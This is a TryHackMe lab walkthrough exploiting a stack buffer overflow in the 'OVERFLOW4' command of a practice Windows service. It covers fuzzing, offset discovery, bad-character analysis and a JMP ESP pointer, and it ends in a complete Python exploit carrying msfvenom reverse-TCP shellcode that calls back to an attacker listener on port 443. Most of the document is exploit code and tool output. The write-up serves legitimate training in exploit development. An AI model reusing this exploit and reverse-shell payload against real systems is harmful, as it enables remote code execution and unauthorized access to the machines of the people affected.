BufferOver Flow — TryHackMe
Walkthrough Fast Forward Video: https://www.youtube.com/watch?v=dHPgRlNW-MU&feature=youtu.be
System IP: 10.10.232.66
Vulnerability Exploited: BufferOver Flow
Vulnerability Fix: To prevent buffer overflow, developers of C/C++ applications should avoid standard library functions that are not bounds-checked, such as gets, scanf, and strcpy.
Severity: Critical
// Run BOF app on a windows box.
// Right Click Immunity Debugger →Run As Administrator → File → Open →Locate App → F9 to Start
Proof of Concept:
Checking the connectivity to the Victim machine.
nc 10.10.232.66 1337
// We will run the exploit on OVERFLOW4
Step 1: Fuzzing and Finding the Crash Point
// Fuzzer ( fuzz.py ) used in this example : https://github.com/anontuttuvenus/BOF/blob/main/fuzz.py
After running the fuzz.py, the application got crashed at 2100 bytes, but it is not the exact value.
We will add 400 bytes to 2100 bytes and will make a cyclic value of 2500 bytes.
For making cyclic value, we will use msf-pattern_create
Step 2: Creating cyclic value with msf-pattern_create
// Exploit ( exploit.py ) used in this example : [ IP will be different ] https://github.com/anontuttuvenus/BOF/blob/main/exploit.py
┌──(root💀kali)-[/opt/BOF]
└─# cat exploit.pyimport socketip = "10.10.232.66"
port = 1337prefix = "OVERFLOW4 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D"
postfix = ""buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try: s.connect((ip, port))
print("Sending evil buffer...")
s.send(buffer + "\r\n")
print("Done!")
except:
print("Could not connect.")
Before running the script we need to re-attach the vulnerable app.
Cntrl +F2 followed by F9
We can fire up the exploit.py, the program will again get crashed.
Step 3: Finding the EIP value
For finding the EIP, we can make use of the mona module.
!mona findmsp -distance 2500where the distance is the cyclic value ( 2500 ), that we created
Now we got the EIP value, we can confirm whether the EIP value is correct or not, EIP is 4 bytes long. 2026 is the starting of EIP, 2026 to 2030 is the EIP value. To confirm this we can add 4 * “B”, to the script. Once the script is executed EIP will be replaced with 42424242, which is hexa equivalent of 4 B’s.
The modified script will be this,
┌──(root💀kali)-[/opt/BOF]
└─# cat exploit.pyimport socketip = "10.10.232.66"
port = 1337prefix = "OVERFLOW4 "
offset = 2026
overflow = "A" * offset
retn = "B" * 4
padding = ""
payload = ""
postfix = ""buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:s.connect((ip, port))
print("Sending evil buffer...")
s.send(buffer + "\r\n")
print("Done!")
except:
print("Could not connect.")
Before running the script we need to re-attach the vuln app, Cntrl + F2 followed by F9.
Now we can confirm that the starting value of EIP is 2026.
Step 4: Finding Badchars.
//I have used this below file, which contains all the badchars. 0 is excluded since it is always a badchar. https://github.com/anontuttuvenus/BOF/blob/main/badchars.txt
We need to modify our script, we will add the badchars in the payload variable section.
┌──(root💀kali)-[/opt/BOF]
└─# cat exploit.pyimport socketip = "10.10.232.66"
port = 1337prefix = "OVERFLOW4 "
offset = 2026
overflow = "A" * offset
retn = "B" * 4
padding = ""
payload = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
postfix = ""buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:s.connect((ip, port))
print("Sending evil buffer...")
s.send(buffer + "\r\n")
print("Done!")except:
print("Could not connect.")
Before running the exploit, we need to re-attach the vuln app. [ Cntrl + F2 → F9 ].
Either we can find the badchars manually or we can make of mona module. Here I will do with the help of the mona module.
Generate a bytearray using mona, and exclude the null byte (\x00) by default
Now, bytearray.txt and bytearray.bin contain all the badchars. We will compare the value on the crashed app with bytearray.bin
We need the value of ESP to compare the same, we can obtain the ESP value from the ” CPU ” Window on Immunity debugger
Let's compare, we will be using the below command :
!mona compare -f C:\mona\oscp\bytearray.bin -a 018AFA30
From the above result, we can see there are multiple badchars.
BadChars : 00 a9 aa cd ce d4 d5
Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even affect the rest of the string. That means, a9 might be badchars since aa is followed by a9, it also got listed.
So at first, we will assume that these will be the badchars`00 a9 cd d4 `
We need to remove “\x00 \xa9 \xcd \xd4 “ from our exploit script and we need to make a new bytearray with mona module excluding the same chars.
Modified exploit.py
┌──(root💀kali)-[/opt/BOF]
└─# cat exploit.pyimport socketip = "10.10.232.66"
port = 1337prefix = "OVERFLOW4 "
offset = 2026
overflow = "A" * offset
retn = "B" * 4
padding = ""
payload = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xce\xcf\xd0"
"\xd1\xd2\xd3\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
postfix = ""buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:s.connect((ip, port))
print("Sending evil buffer...")
s.send(buffer + "\r\n")
print("Done!")except:
print("Could not connect.")
Modified bytearray.bin
We need the value of ESP again to compare, we can obtain the ESP value from the “CPU” Window on Immunity debugger. Don’t use the prev value, there will be a small change.
Now let’s compare, we will be using the below command :
!mona compare -f C:\mona\oscp\bytearray.bin -a 019AFA30
From the above output, we can see that all the badchars are removed.
Final BadChars : “\x00\xa9\xcd\xd4”
Step 5: Finding JMP ESP
Once again we will make use of the mona module, after -cpb it will be total badchars.
!mona jmp -r esp -cpb “\x00\xa9\xcd\xd4”When you execute the command, the Immunity debugger may change the window to “CPU”, you can change it from “CPU” → “Log Data”.
9 pointer are listed, we need to select one of them, check the one which is having false value for ASLR, Rebase, and SafeSEH.
I will be using “625011af” — the pointer
We need to write this in Little Ending format, i.e, af 11 50 62 [ In Reverse ]
JMP ESP →“\xaf\x11\x50\x62”
Step 6: Creating Shell Code
We can use msfvenom to create the shellcode while creating we need to exclude the badchars that we found earlier.
┌──(root💀kali)-[/opt/BOF]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.9.62.7 LPORT=443 -b "\x00\xa9\xcd\xd4" EXITFUNC=thread -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1869 bytes
payload = b""
payload += b"\xb8\xaf\x45\x71\x70\xd9\xf7\xd9\x74\x24\xf4\x5a"
payload += b"\x31\xc9\xb1\x52\x31\x42\x12\x83\xc2\x04\x03\xed"
payload += b"\x4b\x93\x85\x0d\xbb\xd1\x66\xed\x3c\xb6\xef\x08"
payload += b"\x0d\xf6\x94\x59\x3e\xc6\xdf\x0f\xb3\xad\xb2\xbb"
payload += b"\x40\xc3\x1a\xcc\xe1\x6e\x7d\xe3\xf2\xc3\xbd\x62"
payload += b"\x71\x1e\x92\x44\x48\xd1\xe7\x85\x8d\x0c\x05\xd7"
payload += b"\x46\x5a\xb8\xc7\xe3\x16\x01\x6c\xbf\xb7\x01\x91"
payload += b"\x08\xb9\x20\x04\x02\xe0\xe2\xa7\xc7\x98\xaa\xbf"
payload += b"\x04\xa4\x65\x34\xfe\x52\x74\x9c\xce\x9b\xdb\xe1"
payload += b"\xfe\x69\x25\x26\x38\x92\x50\x5e\x3a\x2f\x63\xa5"
payload += b"\x40\xeb\xe6\x3d\xe2\x78\x50\x99\x12\xac\x07\x6a"
payload += b"\x18\x19\x43\x34\x3d\x9c\x80\x4f\x39\x15\x27\x9f"
payload += b"\xcb\x6d\x0c\x3b\x97\x36\x2d\x1a\x7d\x98\x52\x7c"
payload += b"\xde\x45\xf7\xf7\xf3\x92\x8a\x5a\x9c\x57\xa7\x64"
payload += b"\x5c\xf0\xb0\x17\x6e\x5f\x6b\xbf\xc2\x28\xb5\x38"
payload += b"\x24\x03\x01\xd6\xdb\xac\x72\xff\x1f\xf8\x22\x97"
payload += b"\xb6\x81\xa8\x67\x36\x54\x7e\x37\x98\x07\x3f\xe7"
payload += b"\x58\xf8\xd7\xed\x56\x27\xc7\x0e\xbd\x40\x62\xf5"
payload += b"\x56\x65\x7a\xcb\xa1\x11\x7e\x33\xaf\x5a\xf7\xd5"
payload += b"\xc5\x8c\x5e\x4e\x72\x34\xfb\x04\xe3\xb9\xd1\x61"
payload += b"\x23\x31\xd6\x96\xea\xb2\x93\x84\x9b\x32\xee\xf6"
payload += b"\x0a\x4c\xc4\x9e\xd1\xdf\x83\x5e\x9f\xc3\x1b\x09"
payload += b"\xc8\x32\x52\xdf\xe4\x6d\xcc\xfd\xf4\xe8\x37\x45"
payload += b"\x23\xc9\xb6\x44\xa6\x75\x9d\x56\x7e\x75\x99\x02"
payload += b"\x2e\x20\x77\xfc\x88\x9a\x39\x56\x43\x70\x90\x3e"
payload += b"\x12\xba\x23\x38\x1b\x97\xd5\xa4\xaa\x4e\xa0\xdb"
payload += b"\x03\x07\x24\xa4\x79\xb7\xcb\x7f\x3a\xd7\x29\x55"
payload += b"\x37\x70\xf4\x3c\xfa\x1d\x07\xeb\x39\x18\x84\x19"
payload += b"\xc2\xdf\x94\x68\xc7\xa4\x12\x81\xb5\xb5\xf6\xa5"
payload += b"\x6a\xb5\xd2"--> LHOST=10.9.62.7 [ My IP ]
--> LPORT=443 [ Listen Port ]
--> -b "\x00\xa9\xcd\xd4" [ Badchars ]
We are ready for our final payload.
Final Payload will have values for these variable below,
offset = 2026 [ EIP Value]
overflow = "A" * offset
retn="\xaf\x11\x50\x62" -- [JMP ESP Value]
padding = "\x90" * 16 [ Nop Sled ]
payload = shellcode outputexploit.py Final :
┌──(root💀kali)-[/opt/BOF]
└─# cat exploit.pyimport socketip = "10.10.232.66"
port = 1337prefix = "OVERFLOW4 "
offset = 2026
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = b""
payload += b"\xb8\xaf\x45\x71\x70\xd9\xf7\xd9\x74\x24\xf4\x5a"
payload += b"\x31\xc9\xb1\x52\x31\x42\x12\x83\xc2\x04\x03\xed"
payload += b"\x4b\x93\x85\x0d\xbb\xd1\x66\xed\x3c\xb6\xef\x08"
payload += b"\x0d\xf6\x94\x59\x3e\xc6\xdf\x0f\xb3\xad\xb2\xbb"
payload += b"\x40\xc3\x1a\xcc\xe1\x6e\x7d\xe3\xf2\xc3\xbd\x62"
payload += b"\x71\x1e\x92\x44\x48\xd1\xe7\x85\x8d\x0c\x05\xd7"
payload += b"\x46\x5a\xb8\xc7\xe3\x16\x01\x6c\xbf\xb7\x01\x91"
payload += b"\x08\xb9\x20\x04\x02\xe0\xe2\xa7\xc7\x98\xaa\xbf"
payload += b"\x04\xa4\x65\x34\xfe\x52\x74\x9c\xce\x9b\xdb\xe1"
payload += b"\xfe\x69\x25\x26\x38\x92\x50\x5e\x3a\x2f\x63\xa5"
payload += b"\x40\xeb\xe6\x3d\xe2\x78\x50\x99\x12\xac\x07\x6a"
payload += b"\x18\x19\x43\x34\x3d\x9c\x80\x4f\x39\x15\x27\x9f"
payload += b"\xcb\x6d\x0c\x3b\x97\x36\x2d\x1a\x7d\x98\x52\x7c"
payload += b"\xde\x45\xf7\xf7\xf3\x92\x8a\x5a\x9c\x57\xa7\x64"
payload += b"\x5c\xf0\xb0\x17\x6e\x5f\x6b\xbf\xc2\x28\xb5\x38"
payload += b"\x24\x03\x01\xd6\xdb\xac\x72\xff\x1f\xf8\x22\x97"
payload += b"\xb6\x81\xa8\x67\x36\x54\x7e\x37\x98\x07\x3f\xe7"
payload += b"\x58\xf8\xd7\xed\x56\x27\xc7\x0e\xbd\x40\x62\xf5"
payload += b"\x56\x65\x7a\xcb\xa1\x11\x7e\x33\xaf\x5a\xf7\xd5"
payload += b"\xc5\x8c\x5e\x4e\x72\x34\xfb\x04\xe3\xb9\xd1\x61"
payload += b"\x23\x31\xd6\x96\xea\xb2\x93\x84\x9b\x32\xee\xf6"
payload += b"\x0a\x4c\xc4\x9e\xd1\xdf\x83\x5e\x9f\xc3\x1b\x09"
payload += b"\xc8\x32\x52\xdf\xe4\x6d\xcc\xfd\xf4\xe8\x37\x45"
payload += b"\x23\xc9\xb6\x44\xa6\x75\x9d\x56\x7e\x75\x99\x02"
payload += b"\x2e\x20\x77\xfc\x88\x9a\x39\x56\x43\x70\x90\x3e"
payload += b"\x12\xba\x23\x38\x1b\x97\xd5\xa4\xaa\x4e\xa0\xdb"
payload += b"\x03\x07\x24\xa4\x79\xb7\xcb\x7f\x3a\xd7\x29\x55"
payload += b"\x37\x70\xf4\x3c\xfa\x1d\x07\xeb\x39\x18\x84\x19"
payload += b"\xc2\xdf\x94\x68\xc7\xa4\x12\x81\xb5\xb5\xf6\xa5"
payload += b"\x6a\xb5\xd2"
postfix = ""buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:s.connect((ip, port))
print("Sending evil buffer...")
s.send(buffer + "\r\n")
print("Done!")except:
print("Could not connect.")
Before running the exploit.py we need to re-attach the vuln app [ Cntrl + F2 → F9 ] and start a Netcat listener to catch the reverse shell connection.
nc -nvlp 443 
You can praticse BOF here : https://tryhackme.com/room/bufferoverflowprep
